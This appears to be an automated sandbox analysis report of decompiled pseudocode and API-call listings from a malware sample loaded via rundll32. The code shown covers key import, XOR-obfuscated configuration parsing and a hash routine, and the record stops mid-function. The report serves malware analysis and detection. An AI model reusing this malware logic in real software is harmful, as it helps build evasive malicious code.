                                
                                				_t11 =  &_a4;
                                				_t21 = 0;
                                				__imp__( &_a8);
                                				_t13 = E01065FBB( &_a4 + 1, 1, _a8, _a4, _a4, _t11); // executed
                                				if(_t13 == 0) {
                                					_t21 = E01066D63(_a8 + _a8);
                                					if(_t21 != 0) {
                                						E0106298F(_a4, _t21, _t23);
                                					}
                                					E01066C2C(_a4);
                                				}
                                				return _t21;
                                			}





                                0x010624bb
                                0x010624c2
                                0x010624c4
                                0x010624d3
                                0x010624da
                                0x010624e9
                                0x010624ed
                                0x010624f4
                                0x010624f4
                                0x010624fc
                                0x01062501
                                0x01062506

                                APIs
                                • lstrlen.KERNEL32(00000000,00000000,010658D7,00000000,?,01061D97,00000000,010658D7,?,7477C740,010658D7,00000000,051095B0), ref: 010624C4
                                  • Part of subcall function 01065FBB: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,00000000,00000000,?,?,?,010624D8,00000001,010658D7,00000000), ref: 01065FF3
                                  • Part of subcall function 01065FBB: memcpy.NTDLL(010624D8,010658D7,00000010,?,?,?,010624D8,00000001,010658D7,00000000,?,01061D97,00000000,010658D7,?,7477C740), ref: 0106600C
                                  • Part of subcall function 01065FBB: CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,00000000), ref: 01066035
                                  • Part of subcall function 01065FBB: CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 0106604D
                                  • Part of subcall function 01065FBB: memcpy.NTDLL(00000000,7477C740,051095B0,00000010), ref: 0106609F
                                  • Part of subcall function 01066D63: RtlAllocateHeap.NTDLL(00000000,00000000,01065D7B), ref: 01066D6F
                                Memory Dump Source
                                • Source File: 00000003.00000002.643055238.0000000001061000.00000020.10000000.00040000.00000000.sdmp, Offset: 01060000, based on PE: true
                                • Associated: 00000003.00000002.643018010.0000000001060000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643079216.0000000001069000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643090843.000000000106A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643116170.000000000106C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_1060000_rundll32.jbxd
                                Similarity
                                • API ID: Crypt$memcpy$AcquireAllocateContextHeapImportParamlstrlen
                                • String ID:
                                • API String ID: 894908221-0
                                • Opcode ID: 2e58e30feb5717958afcf787195b9c8c7621b880d981237af6314a2432166f79
                                • Instruction ID: 3bf641bce4bb410a774a109707fe7f9e493025401a9ff7bca3b52997cf32b2b3
                                • Opcode Fuzzy Hash: 2e58e30feb5717958afcf787195b9c8c7621b880d981237af6314a2432166f79
                                • Instruction Fuzzy Hash: A4F05E3610010ABBDF126F59DC40CEB7FADEF953A0F008022FD49CA014DA32DA559BA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E010674B6(intOrPtr _a4, intOrPtr _a8, void* _a12, intOrPtr _a16, WCHAR* _a20) {
                                				void* _t17;
                                
                                				if(_a4 == 0) {
                                					L2:
                                					return E010623D9(_a8, 1, _a12, _a16, _a20, lstrlenW(_a20) + _t14 + 2);
                                				}
                                				_t17 = E010614F1(_a4, _a8, _a12, _a16, _a20); // executed
                                				if(_t17 != 0) {
                                					goto L2;
                                				}
                                				return _t17;
                                			}




                                0x010674be
                                0x010674d8
                                0x00000000
                                0x010674f4
                                0x010674cf
                                0x010674d6
                                0x00000000
                                0x00000000
                                0x010674fb

                                APIs
                                • lstrlenW.KERNEL32(?,?,?,0106363B,3D010690,80000002,01067168,01067283,74666F53,4D4C4B48,01067283,?,3D010690,80000002,01067168,?), ref: 010674DB
                                  • Part of subcall function 010614F1: SysAllocString.OLEAUT32(01067283), ref: 0106150A
                                  • Part of subcall function 010614F1: SysFreeString.OLEAUT32(00000000), ref: 0106154B
                                Memory Dump Source
                                • Source File: 00000003.00000002.643055238.0000000001061000.00000020.10000000.00040000.00000000.sdmp, Offset: 01060000, based on PE: true
                                • Associated: 00000003.00000002.643018010.0000000001060000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643079216.0000000001069000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643090843.000000000106A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643116170.000000000106C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_1060000_rundll32.jbxd
                                Similarity
                                • API ID: String$AllocFreelstrlen
                                • String ID:
                                • API String ID: 3808004451-0
                                • Opcode ID: a585aa4cf737dbd17b29baf4400f59cf4874dcd49f989c2851864abb5ba29cb5
                                • Instruction ID: c3753f6b5b4db42ac15feef088abc0e1faf16ff31a3868744df4c0493551e435
                                • Opcode Fuzzy Hash: a585aa4cf737dbd17b29baf4400f59cf4874dcd49f989c2851864abb5ba29cb5
                                • Instruction Fuzzy Hash: 3CF09B3200020EBFEF129F90EC09EEA3FAAAF28754F048014FA4454171DB72C5B1EBA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E01062B23(void* __edi, void* _a4) {
                                				int _t7;
                                				int _t12;
                                
                                				_t7 = E01062575(__edi, _a4,  &_a4); // executed
                                				_t12 = _t7;
                                				if(_t12 != 0) {
                                					memcpy(__edi, _a4, _t12);
                                					 *((char*)(__edi + _t12)) = 0;
                                					E01066C2C(_a4);
                                				}
                                				return _t12;
                                			}





                                0x01062b2f
                                0x01062b34
                                0x01062b38
                                0x01062b3f
                                0x01062b4a
                                0x01062b4e
                                0x01062b4e
                                0x01062b57

                                APIs
                                  • Part of subcall function 01062575: memcpy.NTDLL(00000000,00000110,?,?,?,?,?,?,?,01064493,?), ref: 010625AB
                                  • Part of subcall function 01062575: memset.NTDLL ref: 01062621
                                  • Part of subcall function 01062575: memset.NTDLL ref: 01062635
                                • memcpy.NTDLL(?,?,00000000,?,?,?,?,?,01064493,?,?,?,?), ref: 01062B3F
                                  • Part of subcall function 01066C2C: RtlFreeHeap.NTDLL(00000000,00000000,01065E1D,00000000,?,?,00000000), ref: 01066C38
                                Memory Dump Source
                                • Source File: 00000003.00000002.643055238.0000000001061000.00000020.10000000.00040000.00000000.sdmp, Offset: 01060000, based on PE: true
                                • Associated: 00000003.00000002.643018010.0000000001060000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643079216.0000000001069000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643090843.000000000106A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643116170.000000000106C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_1060000_rundll32.jbxd
                                Similarity
                                • API ID: memcpymemset$FreeHeap
                                • String ID:
                                • API String ID: 3053036209-0
                                • Opcode ID: 9861f71267f26eea5288bfea07ab5eea21efb883178210c204045fd7d85c8362
                                • Instruction ID: cba7a684c95fec9fc807f6ea4f8252ead65452023b8e1cae032aa0ce0909f609
                                • Opcode Fuzzy Hash: 9861f71267f26eea5288bfea07ab5eea21efb883178210c204045fd7d85c8362
                                • Instruction Fuzzy Hash: 02E08C7280012A76CB122E94EC00EEB7F5CDF656A1F004020FE889A200D632C61097E1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 93%
                                			E01061645(void* __ebx, int* __ecx, void* __edi, void* __esi) {
                                				int _v8;
                                				void* _v12;
                                				void* _v16;
                                				signed int _t28;
                                				signed int _t33;
                                				signed int _t39;
                                				char* _t45;
                                				char* _t46;
                                				char* _t47;
                                				char* _t48;
                                				char* _t49;
                                				char* _t50;
                                				void* _t51;
                                				void* _t52;
                                				void* _t53;
                                				intOrPtr _t54;
                                				void* _t56;
                                				intOrPtr _t57;
                                				intOrPtr _t58;
                                				signed int _t61;
                                				intOrPtr _t64;
                                				signed int _t65;
                                				signed int _t70;
                                				void* _t72;
                                				void* _t73;
                                				signed int _t75;
                                				signed int _t78;
                                				signed int _t82;
                                				signed int _t86;
                                				signed int _t90;
                                				signed int _t94;
                                				signed int _t98;
                                				void* _t101;
                                				void* _t102;
                                				void* _t115;
                                				void* _t118;
                                				intOrPtr _t121;
                                
                                				_t118 = __esi;
                                				_t115 = __edi;
                                				_t104 = __ecx;
                                				_t101 = __ebx;
                                				_t28 =  *0x106a344; // 0x69b25f44
                                				if(E01067780( &_v8,  &_v12, _t28 ^ 0x889a0120) != 0 && _v12 >= 0x110) {
                                					 *0x106a378 = _v8;
                                				}
                                				_t33 =  *0x106a344; // 0x69b25f44
                                				if(E01067780( &_v16,  &_v12, _t33 ^ 0x0159e6c7) == 0) {
                                					_v12 = 2;
                                					L69:
                                					return _v12;
                                				}
                                				_t39 =  *0x106a344; // 0x69b25f44
                                				_push(_t115);
                                				if(E01067780( &_v12,  &_v8, _t39 ^ 0xe60382a5) == 0) {
                                					L67:
                                					HeapFree( *0x106a2d8, 0, _v16);
                                					goto L69;
                                				} else {
                                					_push(_t101);
                                					_t102 = _v12;
                                					if(_t102 == 0) {
                                						_t45 = 0;
                                					} else {
                                						_t98 =  *0x106a344; // 0x69b25f44
                                						_t45 = E01065450(_t104, _t102, _t98 ^ 0x7895433b);
                                					}
                                					_push(_t118);
                                					if(_t45 != 0) {
                                						_t104 =  &_v8;
                                						if(StrToIntExA(_t45, 0,  &_v8) != 0) {
                                							 *0x106a2e0 = _v8;
                                						}
                                					}
                                					if(_t102 == 0) {
                                						_t46 = 0;
                                					} else {
                                						_t94 =  *0x106a344; // 0x69b25f44
                                						_t46 = E01065450(_t104, _t102, _t94 ^ 0x219b08c7);
                                					}
                                					if(_t46 != 0) {
                                						_t104 =  &_v8;
                                						if(StrToIntExA(_t46, 0,  &_v8) != 0) {
                                							 *0x106a2e4 = _v8;
                                						}
                                					}
                                					if(_t102 == 0) {
                                						_t47 = 0;
                                					} else {
                                						_t90 =  *0x106a344; // 0x69b25f44
                                						_t47 = E01065450(_t104, _t102, _t90 ^ 0x31fc0661);
                                					}
                                					if(_t47 != 0) {
                                						_t104 =  &_v8;
                                						if(StrToIntExA(_t47, 0,  &_v8) != 0) {
                                							 *0x106a2e8 = _v8;
                                						}
                                					}
                                					if(_t102 == 0) {
                                						_t48 = 0;
                                					} else {
                                						_t86 =  *0x106a344; // 0x69b25f44
                                						_t48 = E01065450(_t104, _t102, _t86 ^ 0x0cd926ce);
                                					}
                                					if(_t48 != 0) {
                                						_t104 =  &_v8;
                                						if(StrToIntExA(_t48, 0,  &_v8) != 0) {
                                							 *0x106a004 = _v8;
                                						}
                                					}
                                					if(_t102 == 0) {
                                						_t49 = 0;
                                					} else {
                                						_t82 =  *0x106a344; // 0x69b25f44
                                						_t49 = E01065450(_t104, _t102, _t82 ^ 0x3cd8b2cb);
                                					}
                                					if(_t49 != 0) {
                                						_t104 =  &_v8;
                                						if(StrToIntExA(_t49, 0,  &_v8) != 0) {
                                							 *0x106a02c = _v8;
                                						}
                                					}
                                					if(_t102 == 0) {
                                						_t50 = 0;
                                					} else {
                                						_t78 =  *0x106a344; // 0x69b25f44
                                						_t50 = E01065450(_t104, _t102, _t78 ^ 0x2878b929);
                                					}
                                					if(_t50 == 0) {
                                						L41:
                                						 *0x106a2ec = 5;
                                						goto L42;
                                					} else {
                                						_t104 =  &_v8;
                                						if(StrToIntExA(_t50, 0,  &_v8) == 0 || _v8 == 0) {
                                							goto L41;
                                						} else {
                                							L42:
                                							if(_t102 == 0) {
                                								_t51 = 0;
                                							} else {
                                								_t75 =  *0x106a344; // 0x69b25f44
                                								_t51 = E01065450(_t104, _t102, _t75 ^ 0x261a367a);
                                							}
                                							if(_t51 != 0) {
                                								_push(_t51);
                                								_t72 = 0x10;
                                								_t73 = E01062FBC(_t72);
                                								if(_t73 != 0) {
                                									_push(_t73);
                                									E010672C7();
                                								}
                                							}
                                							if(_t102 == 0) {
                                								_t52 = 0;
                                							} else {
                                								_t70 =  *0x106a344; // 0x69b25f44
                                								_t52 = E01065450(_t104, _t102, _t70 ^ 0xb9d404b2);
                                							}
                                							if(_t52 != 0 && E01062FBC(0, _t52) != 0) {
                                								_t121 =  *0x106a3cc; // 0x51095b0
                                								E0106765B(_t121 + 4, _t68);
                                							}
                                							if(_t102 == 0) {
                                								_t53 = 0;
                                							} else {
                                								_t65 =  *0x106a344; // 0x69b25f44
                                								_t53 = E01065450(_t104, _t102, _t65 ^ 0x3df17130);
                                							}
                                							if(_t53 == 0) {
                                								L59:
                                								_t54 =  *0x106a348; // 0x409d5a8
                                								_t22 = _t54 + 0x106b252; // 0x616d692f
                                								 *0x106a374 = _t22;
                                								goto L60;
                                							} else {
                                								_t64 = E01062FBC(0, _t53);
                                								 *0x106a374 = _t64;
                                								if(_t64 != 0) {
                                									L60:
                                									if(_t102 == 0) {
                                										_t56 = 0;
                                									} else {
                                										_t61 =  *0x106a344; // 0x69b25f44
                                										_t56 = E01065450(_t104, _t102, _t61 ^ 0xd2079859);
                                									}
                                									if(_t56 == 0) {
                                										_t57 =  *0x106a348; // 0x409d5a8
                                										_t23 = _t57 + 0x106b79e; // 0x6976612e
                                										_t58 = _t23;
                                									} else {
                                										_t58 = E01062FBC(0, _t56);
                                									}
                                									 *0x106a3e0 = _t58;
                                									HeapFree( *0x106a2d8, 0, _t102);
                                									_v12 = 0;
                                									goto L67;
                                								}
                                								goto L59;
                                							}
                                						}
                                					}
                                				}
                                			}








































                                0x01061645
                                0x01061645
                                0x01061645
                                0x01061645
                                0x01061648
                                0x01061665
                                0x01061673
                                0x01061673
                                0x01061678
                                0x01061692
                                0x01061900
                                0x01061907
                                0x0106190b
                                0x0106190b
                                0x01061698
                                0x0106169d
                                0x010616b5
                                0x010618ed
                                0x010618f7
                                0x00000000
                                0x010616bb
                                0x010616bb
                                0x010616bc
                                0x010616c1
                                0x010616d7
                                0x010616c3
                                0x010616c3
                                0x010616d0
                                0x010616d0
                                0x010616d9
                                0x010616e2
                                0x010616e4
                                0x010616ee
                                0x010616f3
                                0x010616f3
                                0x010616ee
                                0x010616fa
                                0x01061710
                                0x010616fc
                                0x010616fc
                                0x01061709
                                0x01061709
                                0x01061714
                                0x01061716
                                0x01061720
                                0x01061725
                                0x01061725
                                0x01061720
                                0x0106172c
                                0x01061742
                                0x0106172e
                                0x0106172e
                                0x0106173b
                                0x0106173b
                                0x01061746
                                0x01061748
                                0x01061752
                                0x01061757
                                0x01061757
                                0x01061752
                                0x0106175e
                                0x01061774
                                0x01061760
                                0x01061760
                                0x0106176d
                                0x0106176d
                                0x01061778
                                0x0106177a
                                0x01061784
                                0x01061789
                                0x01061789
                                0x01061784
                                0x01061790
                                0x010617a6
                                0x01061792
                                0x01061792
                                0x0106179f
                                0x0106179f
                                0x010617aa
                                0x010617ac
                                0x010617b6
                                0x010617bb
                                0x010617bb
                                0x010617b6
                                0x010617c2
                                0x010617d8
                                0x010617c4
                                0x010617c4
                                0x010617d1
                                0x010617d1
                                0x010617dc
                                0x010617ef
                                0x010617ef
                                0x00000000
                                0x010617de
                                0x010617de
                                0x010617e8
                                0x00000000
                                0x010617f9
                                0x010617f9
                                0x010617fb
                                0x01061811
                                0x010617fd
                                0x010617fd
                                0x0106180a
                                0x0106180a
                                0x01061815
                                0x01061817
                                0x0106181a
                                0x0106181b
                                0x01061822
                                0x01061824
                                0x01061825
                                0x01061825
                                0x01061822
                                0x0106182c
                                0x01061842
                                0x0106182e
                                0x0106182e
                                0x0106183b
                                0x0106183b
                                0x01061846
                                0x01061854
                                0x0106185e
                                0x0106185e
                                0x01061866
                                0x0106187c
                                0x01061868
                                0x01061868
                                0x01061875
                                0x01061875
                                0x01061880
                                0x01061893
                                0x01061893
                                0x01061898
                                0x0106189e
                                0x00000000
                                0x01061882
                                0x01061885
                                0x0106188a
                                0x01061891
                                0x010618a3
                                0x010618a5
                                0x010618bb
                                0x010618a7
                                0x010618a7
                                0x010618b4
                                0x010618b4
                                0x010618bf
                                0x010618cb
                                0x010618d0
                                0x010618d0
                                0x010618c1
                                0x010618c4
                                0x010618c4
                                0x010618de
                                0x010618e3
                                0x010618e9
                                0x00000000
                                0x010618ec
                                0x00000000
                                0x01061891
                                0x01061880
                                0x010617e8
                                0x010617dc

                                APIs
                                • StrToIntExA.SHLWAPI(00000000,00000000,?,0106A00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 010616EA
                                • StrToIntExA.SHLWAPI(00000000,00000000,?,0106A00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 0106171C
                                • StrToIntExA.SHLWAPI(00000000,00000000,?,0106A00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 0106174E
                                • StrToIntExA.SHLWAPI(00000000,00000000,?,0106A00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 01061780
                                • StrToIntExA.SHLWAPI(00000000,00000000,?,0106A00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 010617B2
                                • StrToIntExA.SHLWAPI(00000000,00000000,?,0106A00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 010617E4
                                • HeapFree.KERNEL32(00000000,?,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?,?), ref: 010618E3
                                • HeapFree.KERNEL32(00000000,?,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?,?), ref: 010618F7
                                Memory Dump Source
                                • Source File: 00000003.00000002.643055238.0000000001061000.00000020.10000000.00040000.00000000.sdmp, Offset: 01060000, based on PE: true
                                • Associated: 00000003.00000002.643018010.0000000001060000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643079216.0000000001069000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643090843.000000000106A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643116170.000000000106C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_1060000_rundll32.jbxd
                                Similarity
                                • API ID: FreeHeap
                                • String ID:
                                • API String ID: 3298025750-0
                                • Opcode ID: fb5eb21bd350eb23043c52e7af1c47db2a1a3300d4ab947254de3b92dedeaae9
                                • Instruction ID: 10156a62d58d2403df9d2797fa0326297cee67854866c67a1fcb6e0daf08a38b
                                • Opcode Fuzzy Hash: fb5eb21bd350eb23043c52e7af1c47db2a1a3300d4ab947254de3b92dedeaae9
                                • Instruction Fuzzy Hash: A381B074B00215EFD760EBB8DD84D9F7BFDBB8C64472849A5F181E3118EA7ADA408760
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E01066D78(intOrPtr _a4) {
                                				void* _t2;
                                				unsigned int _t4;
                                				void* _t5;
                                				long _t6;
                                				void* _t7;
                                				void* _t15;
                                
                                				_t2 = CreateEventA(0, 1, 0, 0);
                                				 *0x106a30c = _t2;
                                				if(_t2 == 0) {
                                					return GetLastError();
                                				}
                                				_t4 = GetVersion();
                                				if(_t4 != 5) {
                                					L4:
                                					if(_t15 <= 0) {
                                						_t5 = 0x32;
                                						return _t5;
                                					}
                                					L5:
                                					 *0x106a2fc = _t4;
                                					_t6 = GetCurrentProcessId();
                                					 *0x106a2f8 = _t6;
                                					 *0x106a304 = _a4;
                                					_t7 = OpenProcess(0x10047a, 0, _t6);
                                					 *0x106a2f4 = _t7;
                                					if(_t7 == 0) {
                                						 *0x106a2f4 =  *0x106a2f4 | 0xffffffff;
                                					}
                                					return 0;
                                				}
                                				if(_t4 >> 8 > 0) {
                                					goto L5;
                                				}
                                				_t15 = _t4 - _t4;
                                				goto L4;
                                			}









                                0x01066d80
                                0x01066d86
                                0x01066d8d
                                0x00000000
                                0x01066de7
                                0x01066d8f
                                0x01066d97
                                0x01066da4
                                0x01066da4
                                0x01066de4
                                0x00000000
                                0x01066de4
                                0x01066da6
                                0x01066da6
                                0x01066dab
                                0x01066dbd
                                0x01066dc2
                                0x01066dc8
                                0x01066dce
                                0x01066dd5
                                0x01066dd7
                                0x01066dd7
                                0x00000000
                                0x01066dde
                                0x01066da0
                                0x00000000
                                0x00000000
                                0x01066da2
                                0x00000000

                                APIs
                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,01061D07,?), ref: 01066D80
                                • GetVersion.KERNEL32 ref: 01066D8F
                                • GetCurrentProcessId.KERNEL32 ref: 01066DAB
                                • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 01066DC8
                                • GetLastError.KERNEL32 ref: 01066DE7
                                Memory Dump Source
                                • Source File: 00000003.00000002.643055238.0000000001061000.00000020.10000000.00040000.00000000.sdmp, Offset: 01060000, based on PE: true
                                • Associated: 00000003.00000002.643018010.0000000001060000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643079216.0000000001069000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643090843.000000000106A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643116170.000000000106C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_1060000_rundll32.jbxd
                                Similarity
                                • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                                • String ID:
                                • API String ID: 2270775618-0
                                • Opcode ID: 607ee919119ccccc5fdf4fc439d259070f2fb0d3c8d8842981afa7c2b43581b8
                                • Instruction ID: 281699f53efd5958d3ded44e7f86d78d972ef074f9c14b2c054bca4de3db7541
                                • Opcode Fuzzy Hash: 607ee919119ccccc5fdf4fc439d259070f2fb0d3c8d8842981afa7c2b43581b8
                                • Instruction Fuzzy Hash: 6BF0A470A80313DFEB707F289909B183BB4AB50705F104015F5D2DB1E8D77B9080CB15
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 49%
                                			E01064BF1(void* __ecx, intOrPtr* _a4) {
                                				signed int _v8;
                                				signed int _v12;
                                				intOrPtr _v16;
                                				intOrPtr _v20;
                                				intOrPtr _v24;
                                				intOrPtr _v28;
                                				intOrPtr _v32;
                                				intOrPtr _v36;
                                				intOrPtr _v40;
                                				intOrPtr _v44;
                                				intOrPtr _v48;
                                				intOrPtr _v52;
                                				intOrPtr _v56;
                                				intOrPtr _v60;
                                				intOrPtr _v64;
                                				intOrPtr _v68;
                                				intOrPtr _v72;
                                				void _v76;
                                				intOrPtr* _t226;
                                				signed int _t229;
                                				signed int _t231;
                                				signed int _t233;
                                				signed int _t235;
                                				signed int _t237;
                                				signed int _t239;
                                				signed int _t241;
                                				signed int _t243;
                                				signed int _t245;
                                				signed int _t247;
                                				signed int _t249;
                                				signed int _t251;
                                				signed int _t253;
                                				signed int _t255;
                                				signed int _t257;
                                				signed int _t259;
                                				signed int _t338;
                                				signed char* _t348;
                                				signed int _t349;
                                				signed int _t351;
                                				signed int _t353;
                                				signed int _t355;
                                				signed int _t357;
                                				signed int _t359;
                                				signed int _t361;
                                				signed int _t363;
                                				signed int _t365;
                                				signed int _t367;
                                				signed int _t376;
                                				signed int _t378;
                                				signed int _t380;
                                				signed int _t382;
                                				signed int _t384;
                                				intOrPtr* _t400;
                                				signed int* _t401;
                                				signed int _t402;
                                				signed int _t404;
                                				signed int _t406;
                                				signed int _t408;
                                				signed int _t410;
                                				signed int _t412;
                                				signed int _t414;
                                				signed int _t416;
                                				signed int _t418;
                                				signed int _t420;
                                				signed int _t422;
                                				signed int _t424;
                                				signed int _t432;
                                				signed int _t434;
                                				signed int _t436;
                                				signed int _t438;
                                				signed int _t440;
                                				signed int _t508;
                                				signed int _t599;
                                				signed int _t607;
                                				signed int _t613;
                                				signed int _t679;
                                				void* _t682;
                                				signed int _t683;
                                				signed int _t685;
                                				signed int _t690;
                                				signed int _t692;
                                				signed int _t697;
                                				signed int _t699;
                                				signed int _t718;
                                				signed int _t720;
                                				signed int _t722;
                                				signed int _t724;
                                				signed int _t726;
                                				signed int _t728;
                                				signed int _t734;
                                				signed int _t740;
                                				signed int _t742;
                                				signed int _t744;
                                				signed int _t746;
                                				signed int _t748;
                                
                                				_t226 = _a4;
                                				_t348 = __ecx + 2;
                                				_t401 =  &_v76;
                                				_t682 = 0x10;
                                				do {
                                					 *_t401 = (((_t348[1] & 0x000000ff) << 0x00000008 |  *_t348 & 0x000000ff) << 0x00000008 |  *(_t348 - 1) & 0x000000ff) << 0x00000008 |  *(_t348 - 2) & 0x000000ff;
                                					_t401 =  &(_t401[1]);
                                					_t348 =  &(_t348[4]);
                                					_t682 = _t682 - 1;
                                				} while (_t682 != 0);
                                				_t6 = _t226 + 4; // 0x14eb3fc3
                                				_t683 =  *_t6;
                                				_t7 = _t226 + 8; // 0x8d08458b
                                				_t402 =  *_t7;
                                				_t8 = _t226 + 0xc; // 0x56c1184c
                                				_t349 =  *_t8;
                                				asm("rol eax, 0x7");
                                				_t229 = ( !_t683 & _t349 | _t402 & _t683) + _v76 +  *_t226 - 0x28955b88 + _t683;
                                				asm("rol ecx, 0xc");
                                				_t351 = ( !_t229 & _t402 | _t683 & _t229) + _v72 + _t349 - 0x173848aa + _t229;
                                				asm("ror edx, 0xf");
                                				_t404 = ( !_t351 & _t683 | _t351 & _t229) + _v68 + _t402 + 0x242070db + _t351;
                                				asm("ror esi, 0xa");
                                				_t685 = ( !_t404 & _t229 | _t351 & _t404) + _v64 + _t683 - 0x3e423112 + _t404;
                                				_v8 = _t685;
                                				_t690 = _v8;
                                				asm("rol eax, 0x7");
                                				_t231 = ( !_t685 & _t351 | _t404 & _v8) + _v60 + _t229 - 0xa83f051 + _t690;
                                				asm("rol ecx, 0xc");
                                				_t353 = ( !_t231 & _t404 | _t690 & _t231) + _v56 + _t351 + 0x4787c62a + _t231;
                                				asm("ror edx, 0xf");
                                				_t406 = ( !_t353 & _t690 | _t353 & _t231) + _v52 + _t404 - 0x57cfb9ed + _t353;
                                				asm("ror esi, 0xa");
                                				_t692 = ( !_t406 & _t231 | _t353 & _t406) + _v48 + _t690 - 0x2b96aff + _t406;
                                				_v8 = _t692;
                                				_t697 = _v8;
                                				asm("rol eax, 0x7");
                                				_t233 = ( !_t692 & _t353 | _t406 & _v8) + _v44 + _t231 + 0x698098d8 + _t697;
                                				asm("rol ecx, 0xc");
                                				_t355 = ( !_t233 & _t406 | _t697 & _t233) + _v40 + _t353 - 0x74bb0851 + _t233;
                                				asm("ror edx, 0xf");
                                				_t408 = ( !_t355 & _t697 | _t355 & _t233) + _v36 + _t406 - 0xa44f + _t355;
                                				asm("ror esi, 0xa");
                                				_t699 = ( !_t408 & _t233 | _t355 & _t408) + _v32 + _t697 - 0x76a32842 + _t408;
                                				_v8 = _t699;
                                				asm("rol eax, 0x7");
                                				_t235 = ( !_t699 & _t355 | _t408 & _v8) + _v28 + _t233 + 0x6b901122 + _v8;
                                				asm("rol ecx, 0xc");
                                				_t357 = ( !_t235 & _t408 | _v8 & _t235) + _v24 + _t355 - 0x2678e6d + _t235;
                                				_t508 =  !_t357;
                                				asm("ror edx, 0xf");
                                				_t410 = (_t508 & _v8 | _t357 & _t235) + _v20 + _t408 - 0x5986bc72 + _t357;
                                				_v12 = _t410;
                                				_v12 =  !_v12;
                                				asm("ror esi, 0xa");
                                				_t718 = (_v12 & _t235 | _t357 & _t410) + _v16 + _v8 + 0x49b40821 + _t410;
                                				asm("rol eax, 0x5");
                                				_t237 = (_t508 & _t410 | _t357 & _t718) + _v72 + _t235 - 0x9e1da9e + _t718;
                                				asm("rol ecx, 0x9");
                                				_t359 = (_v12 & _t718 | _t410 & _t237) + _v52 + _t357 - 0x3fbf4cc0 + _t237;
                                				asm("rol edx, 0xe");
                                				_t412 = ( !_t718 & _t237 | _t359 & _t718) + _v32 + _t410 + 0x265e5a51 + _t359;
                                				asm("ror esi, 0xc");
                                				_t720 = ( !_t237 & _t359 | _t412 & _t237) + _v76 + _t718 - 0x16493856 + _t412;
                                				asm("rol eax, 0x5");
                                				_t239 = ( !_t359 & _t412 | _t359 & _t720) + _v56 + _t237 - 0x29d0efa3 + _t720;
                                				asm("rol ecx, 0x9");
                                				_t361 = ( !_t412 & _t720 | _t412 & _t239) + _v36 + _t359 + 0x2441453 + _t239;
                                				asm("rol edx, 0xe");
                                				_t414 = ( !_t720 & _t239 | _t361 & _t720) + _v16 + _t412 - 0x275e197f + _t361;
                                				asm("ror esi, 0xc");
                                				_t722 = ( !_t239 & _t361 | _t414 & _t239) + _v60 + _t720 - 0x182c0438 + _t414;
                                				asm("rol eax, 0x5");
                                				_t241 = ( !_t361 & _t414 | _t361 & _t722) + _v40 + _t239 + 0x21e1cde6 + _t722;
                                				asm("rol ecx, 0x9");
                                				_t363 = ( !_t414 & _t722 | _t414 & _t241) + _v20 + _t361 - 0x3cc8f82a + _t241;
                                				asm("rol edx, 0xe");
                                				_t416 = ( !_t722 & _t241 | _t363 & _t722) + _v64 + _t414 - 0xb2af279 + _t363;
                                				asm("ror esi, 0xc");
                                				_t724 = ( !_t241 & _t363 | _t416 & _t241) + _v44 + _t722 + 0x455a14ed + _t416;
                                				asm("rol eax, 0x5");
                                				_t243 = ( !_t363 & _t416 | _t363 & _t724) + _v24 + _t241 - 0x561c16fb + _t724;
                                				asm("rol ecx, 0x9");
                                				_t365 = ( !_t416 & _t724 | _t416 & _t243) + _v68 + _t363 - 0x3105c08 + _t243;
